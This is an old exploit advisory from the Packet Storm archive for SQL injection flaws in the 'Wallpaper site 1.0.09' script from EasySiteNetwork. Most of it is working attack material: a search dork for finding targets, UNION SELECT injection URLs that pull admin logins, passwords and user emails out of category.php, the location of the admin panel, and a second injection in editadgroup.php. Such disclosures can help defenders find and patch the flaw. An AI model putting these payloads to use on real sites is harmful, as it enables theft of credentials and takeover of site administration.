wallpaper-sql.txt

2007-12-24T00:00:00
ID PACKETSTORM:62020
Type packetstorm
Reporter Koller
Modified 2007-12-24T00:00:00

Description

                                        
                                            `# .__ __.   
# NN) NNNN JNNN` NNNN. NNN NNNNNNNNNNN NN)   
# NN) `NNN).NNNF .NNNNN (NN) """4NNN"""` NN)   
# NN) (NNNNNN` (NNNNN) NNN (NNN NN)   
# NN) 4NNNN` NNN(NNN.NNF NNN) NN)   
# NN) JNNNNL (NN) NNNNNN) (NNN NN)   
# NN) JNNNNNN) JNN` `NNNNN JNNF NN)   
# NN) .NNNF (NNN. NNN 4NNN) NNN) NN)   
# NN) JNNN` NNNN (NN) NNN` (NNN NN)   
# NN) NN)   
# .__ http://xaker.name __.  
#  
#  
# script name : Wallpaper site 1.0.09  
# GoogLe Dork : Powered by EasySiteNetwork   
# Of. site : http://www.easysitenetwork.com/  
# The price : ?  
# Risk : Average  
# Found By : Koller  
# Thanks : all members xaker.name & grabberz.com  
# Vulnerable files : category.php, editadgroup.php  
  
# Vuln : www.victim.com/category.php?catid=1+union+select+111,222,concat_ws(char(58),login,password),444+from+admin_login/*  
# www.victim.com/category.php?catid=1+union+select+111,222,concat_ws(char(58),login,password,email),444+from+users/*  
#  
# Admin panel: www.victim.com/siteadmin/index.php  
#  
# Addon :) - sql-injection in editadgroup.php - www.victim.com/siteadmin/editadgroup.php?groupid=2 union select 111,222/*  
  
# P.s. Happy New Year 8)  
#  
# Contact: K0ller (at) hotmail (dot) CoM  
  
`